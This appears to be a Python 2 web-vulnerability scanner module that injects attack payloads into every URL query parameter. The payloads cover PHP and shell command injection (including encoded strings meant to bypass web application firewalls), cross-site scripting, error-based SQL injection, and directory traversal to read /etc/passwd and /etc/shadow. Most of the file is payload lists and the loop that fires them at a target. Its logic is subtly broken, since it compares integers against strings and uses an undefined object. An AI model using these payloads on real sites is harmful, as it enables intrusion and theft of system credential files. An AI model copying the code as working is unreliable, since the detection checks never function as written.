/
Modules.py
119 lines (108 loc) · 5.41 KB
/
Modules.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/env python
import re, urllib, time, requests, os, sys, urllib, urllib2, socket
from urllib import FancyURLopener
from designer import *
def Pentest(url, payloads, vuln):
opener = urllib.urlopen(url)
vulnerabilities = 0
if opener.code == '999':
print COLOR.green + "WebKnight WAF" + COLOR.die + "Detected."
time.sleep(3)
for params in url.split("?")[1].split("&"):
for payload in payloads:
bugs = url.replace(params, params+str(payload).strip())
request = useragent.open(bugs)
html = request.readlines()
for line in html:
checker = re.findall(vuln, line)
if len(checker) != '0':
print "[+] Payload: " + COLOR.green + "{0}".format(payload) + COLOR.die
print "[+] Proof of Concept: " + COLOR.green + "{0}".format(bugs) + COLOR.die
vulnerabilities += 1
if vulnerabilities == '0':
print "[+] Every Payload is Being Properly Escapaed."
else:
print "\n[-] Target is Vulnerable to: " + COLOR.green + "{0}".format(vulnerabilities) + COLOR.die + " :Vulnerabilities."
def RemoteCodeExecution(url):
print COLOR.green + "+++" * 16 + COLOR.die
print COLOR.green + "-- Checking Remote Code Execution --" + COLOR.die
print COLOR.green + "+++" * 16 + COLOR.die
payloads = [';${@print(md5(UrduSecurity))}', ';${@print(md5("UrduSecurity"))}']
# Encrypted Payloads to Bypass Some WAFs
payloads += ['%253B%2524%257B%2540print%2528md5%2528%2522UrduSecurity%2522%2529%2529%257D%253B']
payloads += [';uname;', '&&dir', '&&type C:\\boot.ini', ';phpinfo();', ';phpinfo']
vuln = re.compile("51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot", re.I)
Pentest(url, payloads, vuln)
def XssTest(url):
print COLOR.green + "+++" * 16 + COLOR.die
print COLOR.green + "-- Checking Cross Site Scripting --" + COLOR.die
print COLOR.green + "+++" * 16 + COLOR.die
payloads = ['%27%3EUrduSecurity%3Csvg%2Fonload%3Dconfirm%28%2FUrduSecurity%2F%29%3Eweb', '%78%22%78%3e%78']
payloads += ['%22%3EUrduSecurity%3Csvg%2Fonload%3Dconfirm%28%2FUrduSecurity%2F%29%3Eweb', 'UrduSecurity%3Csvg%2Fonload%3Dconfirm%28%2FUrduSecurity%2F%29%3Eweb']
vuln = re.compile('UrduSecurity<svg|x>x', re.I)
Pentest(url, payloads, vuln)
def ErrBsdSQLi(url):
print COLOR.green + "+++" * 16 + COLOR.die
print COLOR.green + "-- Checking Error Based SQLi --" + COLOR.die
print COLOR.green + "+++" * 16 + COLOR.die
payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
vuln = re.compile("You have an error in your SQL|Incorrect syntax|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
Pentest(url, payloads, vuln)
def dirTrans(url):
print COLOR.green + "+++" * 16 + COLOR.die
print COLOR.green + "-- Checking For Directory Traversal --" + COLOR.die
print COLOR.green + "+++" * 16 + COLOR.die
payloads = ['/etc/master.passwd',
'/master.passwd',
'etc/passwd',
'etc/shadow%00',
'/etc/passwd',
'/etc/passwd%00',
'../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd',
'../../etc/passwd%00',
'../../../etc/passwd',
'../../../etc/passwd%00',
'../../../../etc/passwd',
'../../../../etc/passwd%00',
'../../../../../etc/passwd',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00',
]
vuln = re.compile('root.*bash$', re.I)
Pentest(url, payloads, vuln)